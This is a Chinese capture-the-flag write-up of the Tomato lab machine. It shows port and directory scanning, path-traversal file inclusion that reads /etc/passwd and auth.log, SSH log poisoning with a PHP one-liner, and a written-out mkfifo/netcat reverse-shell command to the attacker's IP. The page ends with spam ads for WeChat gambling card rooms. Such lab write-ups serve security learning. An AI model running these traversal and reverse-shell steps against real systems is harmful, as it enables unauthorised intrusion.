Tomato靶机~文件包含日志
创始人
2024-11-13 02:38:54
0

在这里插入图片描述
寻找网站上传点并把 php 恶意代码文件改成 jpg 上传到网站上在本地包含引入恶意代码,当文件被引入后代码就被执行;

0x01信息收集

# 环境准备: Target IP:192.168.66.143 Attack IP:192.168.66.84 靶机目标:Tomato // 这里需要注意靶机本身环境是桥接模式,我们需要给它换成NAT模式 
# 扫描网段 arp-sacn -l

image-20240802162229327

# 对靶机192.168.66.143端口扫描 nmap 192.168.66.143

image-20240802162452483

# 目录扫描 dirsearch -u "http://192.168.66.143" dirb "http://192.168.66.143"

image-20240802163231021

image-20240802163526548

0x02漏洞发现

image-20240802163658983

发现有文件上传的漏洞

image-20240802164425778

# 由于是linux系统,我们尝试看一下passwd文件 http://192.168.66.143/antibot_image/antibots/info.php?image=../../../../../../../etc/passwd

image-20240802164733628

# 我们再看一下它的日志 http://192.168.66.143/antibot_image/antibots/info.php?image=../../../../../../var/log/auth.log

image-20240802165056349

0x03反弹shell

# 我们尝试写一句话木马 ,进行反弹 ssh ''@192.168.66.143

image-20240802170251857

# 使用中国蚁剑连接

image-20240802170208101

# 连接终端

image-20240802170752470

# 在kali上开个监听 nc -lvvp 9999

image-20240802171501796

# 反弹shell rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.66.128 9999 >/tmp/f // IP是攻击机的

image-20240802171608709

好小子,离成功又近一步!!!

上一篇:HTML-02.新浪新闻-标题-样式1

下一篇:大模型日报 2024-08-01

相关内容

热门资讯

秒懂教程!微信群链接拼三张房卡... 拼三张是一款非常受欢迎的棋牌游戏,咨询房/卡添加微信:56001354许多玩家在游戏中会购买房卡来享...
秒懂教程“微信斗牛房间怎么弄,... 微信斗牛是一款非常受欢迎的棋牌游戏,咨询房/卡添加微信:86909166许多玩家在游戏中会购买房卡来...
仕邦出勤安卓系统,高效便捷的考... 你有没有听说最近仕邦出勤安卓系统的新变化?这可是个大新闻,让我来给你详细说说,保证让你对这款系统有了...
秒懂教程!微信牛牛房卡如何充值... 牛牛是一款非常受欢迎的棋牌游戏,咨询房/卡添加微信:71319951许多玩家在游戏中会购买房卡来享受...
房卡必备教程“金花大厅链接房卡... 人皇大厅是一款非常受欢迎的棋牌游戏,咨询房/卡添加微信:15984933许多玩家在游戏中会购买房卡来...
秒懂教程!微信炸金花怎么买房卡... 炸金花是一款非常受欢迎的棋牌游戏,咨询房/卡添加微信:66336574许多玩家在游戏中会购买房卡来享...
一分钟了解“在哪里买炸金花房卡... 新毛豆互娱是一款非常受欢迎的棋牌游戏,咨询房/卡添加微信:86909166许多玩家在游戏中会购买房卡...
秒懂教程!微信里面拼三张房卡在... 拼三张是一款非常受欢迎的棋牌游戏,咨询房/卡添加微信:56001354许多玩家在游戏中会购买房卡来享...
给大家讲解“微信链接金花房卡怎... 随意玩是一款非常受欢迎的棋牌游戏,咨询房/卡添加微信:160470940许多玩家在游戏中会购买房卡来...
秒懂教程!微信斗牛房卡找谁买,... 斗牛是一款非常受欢迎的棋牌游戏,咨询房/卡添加微信:71319951许多玩家在游戏中会购买房卡来享受...
ia实测“怎样创建微信金花链接... 金花是一款非常受欢迎的棋牌游戏,咨询房/卡添加微信:44346008许多玩家在游戏中会购买房卡来享受...
秒懂教程!微信上链接牛牛房卡,... 牛牛是一款非常受欢迎的棋牌游戏,咨询房/卡添加微信:66336574许多玩家在游戏中会购买房卡来享受...
安卓平板带学习系统的,智能教育... 你有没有想过,拥有一款既能满足日常娱乐需求,又能助力学习的安卓平板电脑,是不是就像拥有了双重身份的超...
一分钟推荐“微信炸金花链接怎样... 微信炸金花是一款非常受欢迎的棋牌游戏,咨询房/卡添加微信:44346008许多玩家在游戏中会购买房卡...
秒懂教程!拼三张房卡链接去哪里... 拼三张是一款非常受欢迎的棋牌游戏,咨询房/卡添加微信:56001354许多玩家在游戏中会购买房卡来享...
一分钟推荐“金花链接房卡如何充... 九酷大厅是一款非常受欢迎的棋牌游戏,咨询房/卡添加微信:86909166许多玩家在游戏中会购买房卡来...
秒懂教程!炸金花房卡怎么弄,新... 炸金花是一款非常受欢迎的棋牌游戏,咨询房/卡添加微信:71319951许多玩家在游戏中会购买房卡来享...
房卡必备教程“微信牛牛房卡招代... 牛牛是一款非常受欢迎的棋牌游戏,咨询房/卡添加微信:160470940许多玩家在游戏中会购买房卡来享...
秒懂教程!怎么创建牛牛房间房卡... 斗牛是一款非常受欢迎的棋牌游戏,咨询房/卡添加微信:66336574许多玩家在游戏中会购买房卡来享受...
安卓手机用锤子系统,探索个性化... 你有没有发现,现在安卓手机的世界里,锤子系统可是个热门话题呢!它就像一股清新的风,吹进了这个五彩斑斓...